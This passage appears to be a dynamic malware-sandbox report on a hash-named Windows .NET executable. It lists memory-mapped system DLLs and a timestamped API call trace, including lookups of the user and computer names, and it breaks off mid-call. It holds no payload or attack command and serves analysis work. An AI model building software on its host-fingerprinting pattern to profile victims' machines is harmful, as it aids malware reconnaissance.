0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 393 start_va = 0x7ff8760c0000 end_va = 0x7ff87631ffff monitored = 0 entry_point = 0x7ff87616b5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 394 start_va = 0x1aa10000 end_va = 0x1aa58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 395 start_va = 0x1aca0000 end_va = 0x1ad9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 396 start_va = 0x1ae90000 end_va = 0x1ae9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae90000" filename = "" Region: id = 397 start_va = 0x1aea0000 end_va = 0x1be9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 398 start_va = 0x460000 end_va = 0x466fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 399 start_va = 0x1bea0000 end_va = 0x1bf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bea0000" filename = "" Region: id = 400 start_va = 0x1bfa0000 end_va = 0x1c491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001bfa0000" filename = "" Region: id = 401 start_va = 0x1ada0000 end_va = 0x1ae5cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "micross.ttf" filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf") Region: id = 402 start_va = 0x1c4a0000 end_va = 0x1c89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c4a0000" filename = "" Region: id = 403 start_va = 0x7ff800280000 end_va = 0x7ff80028ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800280000" filename = "" Region: id = 404 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 405 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 406 start_va = 0x830000 end_va = 0x834fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 407 start_va = 0x2070000 end_va = 0x2070fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 408 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 409 start_va = 0x2080000 end_va = 0x2080fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 410 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 411 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 412 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 413 start_va = 0x1aa60000 end_va = 0x1aa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aa60000" filename = "" Region: id = 414 start_va = 0x1aa70000 end_va = 0x1aa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aa70000" filename = "" Region: id = 415 start_va = 0x1aa80000 end_va = 0x1aa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aa80000" filename = "" Region: id = 416 start_va = 0x1aa90000 end_va = 0x1aa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aa90000" filename = "" Region: id = 417 start_va = 0x1aaa0000 end_va = 0x1aaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaa0000" filename = "" Region: id = 418 start_va = 0x1aab0000 end_va = 0x1aabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aab0000" filename = "" Region: id = 419 start_va = 0x1aad0000 end_va = 0x1aaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aad0000" filename = "" Region: id = 420 start_va = 0x1aaf0000 end_va = 0x1aafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaf0000" filename = "" Region: id = 421 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 422 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 423 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 424 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 425 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 426 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 427 start_va = 0x1c8a0000 end_va = 0x1c97cfff monitored = 0 entry_point = 0x1c8fe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 428 start_va = 0x1c8a0000 end_va = 0x1c99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c8a0000" filename = "" Region: id = 429 start_va = 0x1c9a0000 end_va = 0x1ca9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c9a0000" filename = "" Region: id = 430 start_va = 0x1caa0000 end_va = 0x1cb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001caa0000" filename = "" Region: id = 431 start_va = 0x20a0000 end_va = 0x20a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 432 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 433 start_va = 0x7ff879c90000 end_va = 0x7ff87a122fff monitored = 0 entry_point = 0x7ff879c9f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 434 start_va = 0x20b0000 end_va = 0x20b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 435 start_va = 0x1cba0000 end_va = 0x1cc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001cba0000" filename = "" Region: id = 436 start_va = 0x20c0000 end_va = 0x20c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 437 start_va = 0x1aa60000 end_va = 0x1aaa4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 438 start_va = 0x1aab0000 end_va = 0x1aab3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 439 start_va = 0x1cca0000 end_va = 0x1cd9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001cca0000" filename = "" Region: id = 440 start_va = 0x1cda0000 end_va = 0x1ce2dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 441 start_va = 0x1ce30000 end_va = 0x1d22afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ce30000" filename = "" Region: id = 442 start_va = 0x1aad0000 end_va = 0x1aad3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 443 start_va = 0x1aae0000 end_va = 0x1aaf8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 444 start_va = 0x1ab00000 end_va = 0x1ab00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ab00000" filename = "" Region: id = 445 start_va = 0x1d230000 end_va = 0x1d32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d230000" filename = "" Region: id = 446 start_va = 0x7ff870840000 end_va = 0x7ff8709f7fff monitored = 0 entry_point = 0x7ff8708ae630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 447 start_va = 0x7ff8764e0000 end_va = 0x7ff876861fff monitored = 0 entry_point = 0x7ff876531220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 448 start_va = 0x1aad0000 end_va = 0x1aad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001aad0000" filename = "" Region: id = 667 start_va = 0x1ab10000 end_va = 0x1ab13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 855 start_va = 0x1ab20000 end_va = 0x1ab2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab20000" filename = "" Region: id = 911 start_va = 0x1ac40000 end_va = 0x1ac50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ac40000" filename = "" Region: id = 1014 start_va = 0x7ff864520000 end_va = 0x7ff86463ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll") Region: id = 1248 start_va = 0x7ff8602a0000 end_va = 0x7ff860b39fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll") Region: id = 1357 start_va = 0x7ff8642d0000 end_va = 0x7ff864389fff monitored = 0 entry_point = 0x7ff8642d5d90 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1360 start_va = 0x7ff8751d0000 end_va = 0x7ff8751f7fff monitored = 0 entry_point = 0x7ff8751dc7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1373 start_va = 0x7ff875560000 end_va = 0x7ff875573fff monitored = 0 entry_point = 0x7ff875562d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1780 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1943 start_va = 0x7ff87be90000 end_va = 0x7ff87beebfff monitored = 0 entry_point = 0x7ff87bea6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1944 start_va = 0x1d330000 end_va = 0x1d40ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1946 start_va = 0x1d410000 end_va = 0x1d50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d410000" filename = "" Region: id = 1964 start_va = 0x7ff878b20000 end_va = 0x7ff878be7fff monitored = 0 entry_point = 0x7ff878b613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1965 start_va = 0x7ff874ab0000 end_va = 0x7ff874ac4fff monitored = 0 entry_point = 0x7ff874ab2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1966 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1992 start_va = 0x7ff87efa0000 end_va = 0x7ff87efa7fff monitored = 0 entry_point = 0x7ff87efa1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1993 start_va = 0x7ff875270000 end_va = 0x7ff875285fff monitored = 0 entry_point = 0x7ff8752719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1994 start_va = 0x7ff875250000 end_va = 0x7ff875269fff monitored = 0 entry_point = 0x7ff875252430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1995 start_va = 0x1ab20000 end_va = 0x1ab20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1996 start_va = 0x1ab20000 end_va = 0x1ab28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1997 start_va = 0x1ab20000 end_va = 0x1ab20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1998 start_va = 0x1ab20000 end_va = 0x1ab28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1999 start_va = 0x1ab20000 end_va = 0x1ab20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2000 start_va = 0x1ab20000 end_va = 0x1ab28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 2001 start_va = 0x1d510000 end_va = 0x1d60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d510000" filename = "" Region: id = 2002 start_va = 0x7ff87b030000 end_va = 0x7ff87b0d9fff monitored = 0 entry_point = 0x7ff87b057910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2003 start_va = 0x7ff8750d0000 end_va = 0x7ff8750dafff monitored = 0 entry_point = 0x7ff8750d1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2011 start_va = 0x7ff874830000 end_va = 0x7ff874839fff monitored = 0 entry_point = 0x7ff8748314c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2012 start_va = 0x1d610000 end_va = 0x1d667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001d610000" filename = "" Region: id = 2013 start_va = 0x1ab20000 end_va = 0x1ab20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ab20000" filename = "" Region: id = 2014 start_va = 0x1d670000 end_va = 0x1d76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001d670000" filename = "" Region: id = 2016 start_va = 0x1ab20000 end_va = 0x1ab20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab20000" filename = "" Thread: id = 1 os_tid = 0xe7c [0098.510] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0100.566] RoInitialize () returned 0x1 [0100.566] RoUninitialize () returned 0x0 [0103.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0103.546] IsAppThemed () returned 0x1 [0103.553] CoTaskMemAlloc (cb=0xf0) returned 0x520df0 [0103.553] CreateActCtxA (pActCtx=0x14ef00) returned 0x52ddd8 [0103.681] CoTaskMemFree (pv=0x520df0) [0103.750] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc208 [0103.750] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc209 [0107.351] GetUserNameW (in: lpBuffer=0x14ed30, pcbBuffer=0x14f058 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x14f058) returned 1 [0107.395] GetComputerNameW (in: lpBuffer=0x14ed30, nSize=0x14f058 | out: lpBuffer="XC64ZB", nSize=0x14f058) returned 1 [0107.754] GetSystemMetrics (nIndex=75) returned 1 [0107.912] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0108.630] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7ff8749c0000 [0108.736] AdjustWindowRectEx (in: lpRect=0x14ef90, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x14ef90) returned 1 [0108.746] GetCurrentProcess () returned 0xffffffffffffffff [0108.746] GetCurrentThread () returned 0xfffffffffffffffe [0108.746] GetCurrentProcess () returned 0xffffffffffffffff [0108.746] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14eda0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x14eda0*=0x280) returned 1 [0108.749] GetCurrentThreadId () returned 0xe7c [0108.776] GetCurrentActCtx (in: lphActCtx=0x14eca0 | out: lphActCtx=0x14eca0*=0x0) returned 1 [0108.777] ActivateActCtx (in: hActCtx=0x52ddd8, lpCookie=0x14ece0 | out: hActCtx=0x52ddd8, lpCookie=0x14ece0) returned 1 [0108.777] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0110.068] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7ff872050000 [0110.185] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ff87ed60000 [0110.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x14e9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW", lpUsedDefaultChar=0x0) returned 14 [0110.186] GetProcAddress (hModule=0x7ff87ed60000, lpProcName="DefWindowProcW") returned 0x7ff880044a40 [0110.188] GetStockObject (i=5) returned 0x1900015 [0110.275] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0110.424] CoTaskMemAlloc (cb=0x5a) returned 0x52fe00 [0110.424] RegisterClassW (lpWndClass=0x14e990) returned 0xc205 [0110.425] CoTaskMemFree (pv=0x52fe00) [0110.425] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0110.426] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r8_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x80330 [0110.585] SetWindowLongPtrW (hWnd=0x80330, nIndex=-4, dwNewLong=0x7ff880044a40) returned 0x1ac9085c [0110.590] GetWindowLongPtrW (hWnd=0x80330, nIndex=-4) returned 0x7ff880044a40 [0110.601] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dd58 | out: phkResult=0x14dd58*=0x2a0) returned 0x0 [0110.602] RegQueryValueExW (in: hKey=0x2a0, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x14dda8, lpData=0x0, lpcbData=0x14dda0*=0x0 | out: lpType=0x14dda8*=0x0, lpData=0x0, lpcbData=0x14dda0*=0x0) returned 0x2 [0110.602] RegQueryValueExW (in: hKey=0x2a0, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x14dda8, lpData=0x0, lpcbData=0x14dda0*=0x0 | out: lpType=0x14dda8*=0x0, lpData=0x0, lpcbData=0x14dda0*=0x0) returned 0x2 [0110.604] RegCloseKey (hKey=0x2a0) returned 0x0 [0110.606] SetWindowLongPtrW (hWnd=0x80330, nIndex=-4, dwNewLong=0x1ac908ac) returned 0x7ff880044a40 [0110.606] GetWindowLongPtrW (hWnd=0x80330, nIndex=-4) returned 0x1ac908ac [0110.606] GetWindowLongPtrW (hWnd=0x80330, nIndex=-16) returned 0x6c10000 [0110.610] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1e7 [0110.611] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x80330, Msg=0x24, wParam=0x0, lParam=0x14e3b0) returned 0x0 [0110.612] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc150 [0110.612] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x80330, Msg=0x81, wParam=0x0, lParam=0x14e320) returned 0x1 [0110.613] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x80330, Msg=0x83, wParam=0x0, lParam=0x14e3d0) returned 0x0 [0111.780] CallWindowProcW (lpPrevWndFunc=0x7ff880044a40, hWnd=0x80330, Msg=0x1, wParam=0x0, lParam=0x14e320) returned 0x0 [0111.781] GetClientRect (in: hWnd=0x80330, lpRect=0x14ddb0 | out: lpRect=0x14ddb0) returned 1 [0111.781] GetWindowRect (in: hWnd=0x80330, lpRect=0x14ddb0 | out: lpRect=0x14ddb0) returned 1 [0111.787] GetParent (hWnd=0x80330) returned 0x0 [0111.788] DeactivateActCtx (dwFlags=0x0, ulCookie=0x115a685b00000001) returned 1 [0112.799] EtwEventRegister () returned 0x0 [0112.803] EtwEventSetInformation () returned 0x0 [0112.958] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x7ff8749c0000 [0112.959] AdjustWindowRectEx (in: lpRect=0x14ef08, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x14ef08) returned 1 [0112.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", lpFilePart=0x0) returned 0x69 [0112.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x14eb70) returned 1 [0112.975] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x14ec50 | out: lpFileInformation=0x14ec50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0112.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x14eb30) returned 1 [0113.375] CreateCompatibleDC (hdc=0x0) returned 0x9010887 [0113.386] GetSystemDefaultLCID () returned 0x409 [0113.387] GetStockObject (i=17) returned 0x10a0047 [0113.391] GetObjectW (in: h=0x10a0047, c=92, pv=0x14e9f0 | out: pv=0x14e9f0) returned 92 [0113.393] GetDC (hWnd=0x0) returned 0x110106ca [0114.033] GdiplusStartup (in: token=0x7ff800116e88, input=0x14d2f8, output=0x14d3a8 | out: token=0x7ff800116e88, output=0x14d3a8) returned 0x0 [0114.068] CoTaskMemAlloc (cb=0x5c) returned 0x52fd90 [0114.883] GdipCreateFontFromLogfontW (hdc=0x110106ca, logfont=0x52fd90, 